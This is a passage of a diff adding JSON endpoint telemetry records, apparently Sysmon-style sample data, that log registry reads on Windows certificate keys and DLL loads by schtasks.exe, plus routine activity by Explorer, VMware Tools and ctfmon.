"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "schtasks.exe", + "image_path": "C:\\Windows\\System32\\schtasks.exe", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573804950016, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573805110000, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573805259984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573805259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573805259984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "image_load", + "image_name": "xmllite.dll", + "image_path": "C:\\Windows\\System32\\xmllite.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573805259984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573805420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "taskschd.dll", + "image_path": "C:\\Windows\\System32\\taskschd.dll", + "pid": 6308, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "timestamp": 131883573805259984, + "unique_pid": "{42FC7E13-CC04-5C05-0000-00103EEC5601}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573849650000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573849650000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573849650000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000009053C", + "registry_value": "W32:000000000009053C", + "timestamp": 131883573875900000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000009053C", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000009053C\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883573875900000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "file", + "file_name": "SVCHOST.EXE-E3F19127.pf", + "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-E3F19127.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573894960000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883573905270000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883573905270000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883573905270000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883573905730000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883573905730000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883573906670000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883573906820000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 5824, + "process_name": "SearchIndexer.exe", + "process_path": 